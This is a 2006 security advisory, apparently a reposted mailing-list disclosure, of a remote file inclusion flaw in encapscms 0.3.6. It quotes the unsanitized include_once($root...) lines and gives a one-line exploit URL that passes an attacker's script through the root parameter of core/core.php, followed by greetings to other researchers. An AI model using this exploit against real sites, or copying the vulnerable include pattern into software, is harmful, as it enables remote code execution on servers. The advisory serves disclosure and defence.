Security Advisory: encapscms 0.3.6 - Remote File Include by Firewall

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  WORK System E-Commerce (g_include) Remote File Inclusion Vulnerability
  [x0n3-h4ck]Drake CMS v 0.2 XSS exploit

From: firewall1954_(at)_hotmail.com <firewall1954_(at)_hotmail.com>
Date: 11.11.2006
Subject: encapscms 0.3.6 - Remote File Include by Firewall

########################### Firewall ###########################
encapscms 0.3.6 - Remote File Include by Firewall
BuG FounD by Firewall

# Application Affect:
encapscms 0.3.6

# Sorce Code:
http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip

# Code:
        include_once($root."core/Config.php");
        include_once($root."core/DB_sql.php");
        include_once($root."core/BlogsCats.php");
        include_once($root."core/Block.php");
        include_once($root."core/Block_sub.php");
        include_once($root."core/Gallery.php");
        include_once($root."core/Pager.php");
        include_once($root."core/GalleryCategory.php");
        include_once($root."core/Misc.php");

# ExPloit :
http://www.site.com/encapscms_PATH/core/core.php?root=[Evil Script]

#Contact:    Firewall1954@hotmail.com

# GrEatZ :
|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH| |Cvir.System|napster|saok|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|ANtrAX|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad" - "Viva el Peru"

########################### Firewall ###########################